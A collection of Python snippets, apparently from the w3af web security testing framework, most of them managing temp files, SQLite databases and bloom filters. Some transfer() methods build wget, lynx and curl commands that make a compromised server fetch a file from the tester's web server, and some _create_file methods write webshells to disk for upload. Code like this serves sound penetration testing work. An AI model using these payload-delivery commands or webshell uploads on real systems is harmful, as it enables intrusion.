def transfer(self, data_str, destination): ''' This method is used to transfer the data_str from w3af to the compromised server. ''' if not self._command: self.can_transfer() commandTemplates = {} commandTemplates['wget'] = 'wget http://%s:%s/%s -O %s' commandTemplates['lynx'] = 'lynx -source http://%s:%s/%s > %s' commandTemplates['curl'] = 'curl http://%s:%s/%s > %s' # Create the file filename = rand_alpha(10) file_path = get_temp_dir() + os.path.sep + filename f = file(file_path, 'w') f.write(data_str) f.close() # Start a web server on the inbound port and create the file that # will be fetched by the compromised host webserver.start_webserver(cf.cf.get('local_ip_address'), self._inbound_port, get_temp_dir()) commandToRun = commandTemplates[self._command] % \ (cf.cf.get('local_ip_address'), self._inbound_port, filename, destination) self._exec_method(commandToRun) os.remove(file_path) return self.verify_upload(data_str, destination)
def initStructure(self): '''Init history structure.''' sessionName = cf.cf.getData('sessionName') dbName = os.path.join(get_temp_dir(), 'db_' + sessionName) self._db = DB() # Check if the database already exists if os.path.exists(dbName): # Find one that doesn't exist for i in xrange(100): newDbName = dbName + '-' + str(i) if not os.path.exists(newDbName): dbName = newDbName break self._db.connect(dbName) self._sessionDir = os.path.join(get_temp_dir(), self._db.getFileName() + '_traces') tablename = self.getTableName() # Init tables self._db.createTable( tablename, self.getColumns(), self.getPrimaryKeyColumns()) self._db.createIndex(tablename, self.getIndexColumns()) # Init dirs try: os.mkdir(self._sessionDir) except OSError, oe: # [Errno EEXIST] File exists if oe.errno != EEXIST: msg = 'Unable to write to the user home directory: ' + get_temp_dir() raise w3afException(msg)
def transfer(self, strObject, destination): """ This method is used to transfer the strObject from w3af to the compromised server. """ if not self._command: self.canTransfer() commandTemplates = {} commandTemplates["wget"] = "wget http://%s:%s/%s -O %s" commandTemplates["lynx"] = "lynx -source http://%s:%s/%s > %s" commandTemplates["curl"] = "curl http://%s:%s/%s > %s" # Create the file filename = createRandAlpha(10) filePath = get_temp_dir() + os.path.sep + filename f = file(filePath, "w") f.write(strObject) f.close() # Start a web server on the inbound port and create the file that # will be fetched by the compromised host webserver.start_webserver(cf.cf.getData("localAddress"), self._inboundPort, get_temp_dir() + os.path.sep) commandToRun = commandTemplates[self._command] % ( cf.cf.getData("localAddress"), self._inboundPort, filename, destination, ) self._exec_method(commandToRun) os.remove(filePath) return self.verify_upload(strObject, destination)
def _get_files( self ): ''' If the extension is in the templates dir, open it and return the handler. If the extension isn't in the templates dir, create a file with random content, open it and return the handler. @return: A list of open files. ''' result = [] # All of this work is done in the "/tmp" directory: for ext in self._extensions: template_filename = 'template.' + ext if template_filename in os.listdir( self._template_dir ): # # Copy to "/tmp" # # Open target temp_dir = get_temp_dir() low_level_fd, file_name = tempfile.mkstemp(prefix='w3af_', suffix='.' + ext, dir=temp_dir) file_handler = os.fdopen(low_level_fd, "w+b") # Read source template_content = file( os.path.join(self._template_dir, template_filename)).read() # Write content to target file_handler.write(template_content) file_handler.close() # Open the target again: try: file_handler = file( file_name, 'r') except: raise w3afException('Failed to open temp file: "' + file_name + '".') else: path, file_name = os.path.split(file_name) result.append( (file_handler, file_name) ) else: # I dont have a template for this file extension! temp_dir = get_temp_dir() low_level_fd, file_name = tempfile.mkstemp(prefix='w3af_', suffix='.' + ext, dir=temp_dir) file_handler = os.fdopen(low_level_fd, "w+b") file_handler.write( createRandAlNum(32) ) file_handler.close() path, file_name = os.path.split(file_name) result.append( (file(file_name), file_name) ) return result
def _create_file(self, extension): ''' Create a file with a webshell as content. :return: Name of the file that was created. ''' # Get content file_content, real_extension = shell_handler.get_webshells( extension, force_extension=True)[0] if extension == '': extension = real_extension # Open target temp_dir = get_temp_dir() low_level_fd, path_name = tempfile.mkstemp(prefix='w3af_', suffix='.' + extension, dir=temp_dir) file_handler = os.fdopen(low_level_fd, "w+b") # Write content to target file_handler.write(file_content) file_handler.close() path, file_name = os.path.split(path_name) return path, file_name
def clear_default_temp_db_instance(): global temp_default_db if temp_default_db is not None: temp_default_db.close() temp_default_db = None os.unlink('%s/main.db' % get_temp_dir())
def _remove_files(self, fileh_filen_list): """ Close all open files and remove them from disk. This is the reverse of _create_files method. :param fileh_filen_list: A list of tuples as generated by _create_files :return: None >>> from core.controllers.misc.temp_dir import create_temp_dir >>> _ = create_temp_dir() >>> fu = file_upload() >>> dir_before = os.listdir( get_temp_dir() ) >>> fileh_filen_list = fu._create_files() >>> fu._remove_files(fileh_filen_list) >>> dir_after = os.listdir( get_temp_dir() ) >>> dir_before == dir_after True """ for tmp_file_handle, tmp_file_name in fileh_filen_list: try: tmp_file_handle.close() fname = os.path.join(get_temp_dir(), tmp_file_name) os.remove(fname) except: pass
def _create_files(self): """ If the extension is in the templates dir, open it and return the handler. If the extension isn't in the templates dir, create a file with random content, open it and return the handler. :return: A list of tuples with (file handler, file name) """ result = [] for ext in self._extensions: # Open target temp_dir = get_temp_dir() low_level_fd, file_name = tempfile.mkstemp(prefix="w3af_", suffix="." + ext, dir=temp_dir) file_handler = os.fdopen(low_level_fd, "w+b") template_filename = "template." + ext if template_filename in os.listdir(self.TEMPLATE_DIR): content = file(os.path.join(self.TEMPLATE_DIR, template_filename)).read() else: # Since I don't have a template for this file extension, I'll simply # put some random alnum inside the file content = rand_alnum(64) # Write content to target file_handler.write(content) file_handler.close() # Open the target again, should never fail. file_handler = file(file_name, "r") _, file_name = os.path.split(file_name) result.append((file_handler, file_name)) return result
def _remove_files(self, fileh_filen_list): ''' Close all open files and remove them from disk. This is the reverse of _create_files method. :param fileh_filen_list: A list of tuples as generated by _create_files :return: None >>> from core.controllers.misc.temp_dir import create_temp_dir >>> _ = create_temp_dir() >>> fu = file_upload() >>> dir_before = os.listdir( get_temp_dir() ) >>> fileh_filen_list = fu._create_files() >>> fu._remove_files(fileh_filen_list) >>> dir_after = os.listdir( get_temp_dir() ) >>> dir_before == dir_after True ''' for tmp_file_handle, tmp_file_name in fileh_filen_list: try: tmp_file_handle.close() fname = os.path.join(get_temp_dir(), tmp_file_name) os.remove(fname) except: pass
def get_default_temp_db_instance(): global temp_default_db if temp_default_db is None: create_temp_dir() temp_default_db = SQLiteDBMS('%s/main.db' % get_temp_dir()) return temp_default_db
def get_temp_file(): # # Create the temp file # tempdir = get_temp_dir() if not os.path.exists(tempdir): os.makedirs(tempdir) filename = ''.join([choice(string.letters) for _ in range(12)]) temp_file = os.path.join(tempdir, filename + '-w3af.bloom') return temp_file
def __init__(self, capacity, error_rate=0.01): generic_bloomfilter.__init__(self, capacity, error_rate) # # Create the temp file # tempdir = get_temp_dir() if not os.path.exists( tempdir ): os.makedirs( tempdir ) filename = ''.join([choice(string.letters) for i in range(12)]) + '.w3af.bloom' temp_file = os.path.join(tempdir, filename) self.bf = mmap_filter(capacity, error_rate, temp_file)
def __init__(self): ''' Create the shelve, and the thread lock. @return: None ''' # Init some attributes self._shelve = None self._filename = None # Create the lock self._shelve_lock = threading.RLock() fail_count = 0 while True: # Get the temp filename to use tempdir = get_temp_dir() filename = ''.join([choice(string.letters) for _ in range(12)]) + '.w3af.temp_shelve' self._filename = os.path.join(tempdir, filename) # https://sourceforge.net/tracker/?func=detail&aid=2828136&group_id=170274&atid=853652 if (sys.platform=='win32') or (sys.platform=='cygwin'): self._filename = self._filename.decode( "MBCS" ).encode("utf-8" ) try: # Create the shelve self._shelve = shelve.open(self._filename, flag='c') except Exception, e: self._filename = None fail_count += 1 if fail_count == 5: msg = 'Failed to create shelve file "%s". Original exception: "%s"' raise Exception( msg % (self._filename, e)) else: break # Now we perform a small trick... we remove the temp file directory entry # # According to the python documentation: On Windows, attempting to remove a file that # is in use causes an exception to be raised; on Unix, the directory entry is removed # but the storage allocated to the file is not made available until the original file # is no longer in use try: os.remove(self._filename) except Exception: pass
def test_removes_cache(self): url = URL('http://moth/') self.uri_opener.GET(url, cache=False) # Please note that this line, together with the tearDown() act as # a test for a "double call to end()". self.uri_opener.end() db_fmt = 'db_unittest-%s' trace_fmt = 'db_unittest-%s_traces/' temp_dir = get_temp_dir() for i in xrange(100): test_db_path = os.path.join(temp_dir, db_fmt % i) test_trace_path = os.path.join(temp_dir, trace_fmt % i) self.assertFalse(os.path.exists(test_db_path), test_db_path) self.assertFalse(os.path.exists(test_trace_path), test_trace_path)
def _create_file( self, extension ): ''' Create a file with a webshell as content. @return: Name of the file that was created. ''' # Get content file_content, real_extension = shell_handler.get_webshells( extension, forceExtension=True )[0] if extension == '': extension = real_extension # Open target temp_dir = get_temp_dir() low_level_fd, self._path_name = tempfile.mkstemp(prefix='w3af_', suffix='.' + extension, dir=temp_dir) file_handler = os.fdopen(low_level_fd, "w+b") # Write content to target file_handler.write(file_content) file_handler.close() _path, self._file_name = os.path.split(self._path_name) return self._path_name
def _create_file(self, extension): """ Create a file with a webshell as content. :return: Name of the file that was created. """ # Get content file_content, real_extension = shell_handler.get_webshells(extension, force_extension=True)[0] if extension == "": extension = real_extension # Open target temp_dir = get_temp_dir() low_level_fd, path_name = tempfile.mkstemp(prefix="w3af_", suffix="." + extension, dir=temp_dir) file_handler = os.fdopen(low_level_fd, "w+b") # Write content to target file_handler.write(file_content) file_handler.close() path, file_name = os.path.split(path_name) return path, file_name
def _create_files(self): ''' If the extension is in the templates dir, open it and return the handler. If the extension isn't in the templates dir, create a file with random content, open it and return the handler. :return: A list of tuples with (file handler, file name) ''' result = [] for ext in self._extensions: # Open target temp_dir = get_temp_dir() low_level_fd, file_name = tempfile.mkstemp(prefix='w3af_', suffix='.' + ext, dir=temp_dir) file_handler = os.fdopen(low_level_fd, "w+b") template_filename = 'template.' + ext if template_filename in os.listdir(self.TEMPLATE_DIR): content = file( os.path.join(self.TEMPLATE_DIR, template_filename)).read() else: # Since I don't have a template for this file extension, I'll simply # put some random alnum inside the file content = rand_alnum(64) # Write content to target file_handler.write(content) file_handler.close() # Open the target again, should never fail. file_handler = file(file_name, 'r') _, file_name = os.path.split(file_name) result.append((file_handler, file_name)) return result
def __init__(self, text_factory=sqlite3.OptimizedUnicode): ''' Create the sqlite3 database and the thread lock. @param text_factory: A callable object to handle strings. ''' # Init some attributes self._conn = None self._filename = None self._current_index = 0 # text factory for the connection self._text_factory = text_factory # Create the lock self._db_lock = threading.RLock() fail_count = 0 while True: # Get the temp filename to use tempdir = get_temp_dir() filename = ''.join([choice(string.letters) for i in range(12)]) + '.w3af.temp_db' self._filename = os.path.join(tempdir, filename) if sys.platform in ('win32', 'cygwin'): self._filename = self._filename.decode("MBCS").encode("utf-8") try: # Create the database self._conn = sqlite3.connect(self._filename, check_same_thread=False) # Set up the text_factory to the connection self._conn.text_factory = self._text_factory # Create table self._conn.execute( '''CREATE TABLE data (index_ real, information text)''') # Create index self._conn.execute( '''CREATE INDEX data_index ON data(information)''') except Exception, e: fail_count += 1 if fail_count == 5: raise Exception('Failed to create database file. ' 'Original exception: "%s %s"' % (e, self._filename)) self._filename = None else: break # Now we perform a small trick... we remove the temp file directory entry # # According to the python documentation: On Windows, attempting to remove a file that # is in use causes an exception to be raised; on Unix, the directory entry is removed # but the storage allocated to the file is not made available until the original file # is no longer in use try: os.remove(self._filename) except Exception: pass
def __init__(self, text_factory=sqlite3.OptimizedUnicode): """ Create the sqlite3 database and the thread lock. @param text_factory: A callable object to handle strings. @return: None """ # Init some attributes self._conn = None self._filename = None self._current_index = 0 # text factory for the connection self._text_factory = text_factory # Create the lock self._db_lock = threading.RLock() fail_count = 0 while True: # Get the temp filename to use tempdir = get_temp_dir() filename = "".join([choice(string.letters) for i in range(12)]) + ".w3af.temp_db" self._filename = os.path.join(tempdir, filename) # https://sourceforge.net/tracker/?func=detail&aid=2828136&group_id=170274&atid=853652 if (sys.platform == "win32") or (sys.platform == "cygwin"): self._filename = self._filename.decode("MBCS").encode("utf-8") try: # Create the database self._conn = sqlite3.connect(self._filename, check_same_thread=False) # Set up the text_factory to the connection # See http://sourceforge.net/tracker/?func=detail&aid=3045048&group_id=170274&atid=853652 self._conn.text_factory = self._text_factory # Create table self._conn.execute("""create table data (index_ real, information text)""") except Exception, e: fail_count += 1 if fail_count == 5: msg = 'Failed to create database file. Original exception: "%s %s"' % (e, self._filename) raise Exception(msg) self._filename = None else: break # Now we perform a small trick... we remove the temp file directory entry # # According to the python documentation: On Windows, attempting to remove a file that # is in use causes an exception to be raised; on Unix, the directory entry is removed # but the storage allocated to the file is not made available until the original file # is no longer in use try: os.remove(self._filename) except Exception: pass
def __init__(self): self._db = get_default_temp_db_instance() self._session_dir = os.path.join(get_temp_dir(), self._db.get_file_name() + '_traces')
def get_temp_filename(): temp_dir = get_temp_dir() fname = ''.join(starmap(choice, repeat((string.letters,), 18))) filename = os.path.join(temp_dir, fname + '.w3af.temp_db') return filename
def get_temp_filename(): temp_dir = get_temp_dir() fname = ''.join(starmap(choice, repeat((string.letters, ), 18))) filename = os.path.join(temp_dir, fname + '.w3af.temp_db') return filename
def __init__(self): """ Create the sqlite3 database and the thread lock. @param text_factory: A callable object to handle strings. """ # Init some attributes self._conn = None self._filename = None self._current_index = 0 # Create the lock self._db_lock = threading.RLock() fail_count = 0 while True: # Get the temp filename to use tempdir = get_temp_dir() # A 12-chars random string fn = "".join(starmap(choice, repeat((string.letters,), 12))) self._filename = os.path.join(tempdir, fn + ".w3af.temp_db") if sys.platform in ("win32", "cygwin"): self._filename = self._filename.decode("MBCS").encode("utf-8") try: # Create the database self._conn = sqlite3.connect(self._filename, check_same_thread=False) self._conn.text_factory = str # Modify some default values # http://www.sqlite.org/pragma.html#pragma_cache_size (default: 2000) # less pages in memory self._conn.execute("PRAGMA cache_size = 200") # http://www.sqlite.org/pragma.html#pragma_synchronous (default: 1) # sends data to OS and does NOT wait for it to be on-disk self._conn.execute("PRAGMA synchronous = 0") # http://www.sqlite.org/pragma.html#pragma_synchronous # disables journal -> ROLLBACK self._conn.execute("PRAGMA journal_mode = OFF") # Create table self._conn.execute("""CREATE TABLE data (index_ REAL PRIMARY KEY, eq_attrs BLOB, pickle BLOB)""") # Create index self._conn.execute("""CREATE INDEX data_index ON data(eq_attrs)""") except Exception, e: fail_count += 1 if fail_count == 5: raise Exception( "Failed to create database file. " 'Original exception: "%s %s"' % (e, self._filename) ) self._filename = None else: break # Now we perform a small trick... we remove the temp file directory # entry # # According to the python documentation: On Windows, attempting to # remove a file that is in use causes an exception to be raised; # on Unix, the directory entry is removed but the storage allocated # to the file is not made available until the original file is no # longer in use try: os.remove(self._filename) except Exception: pass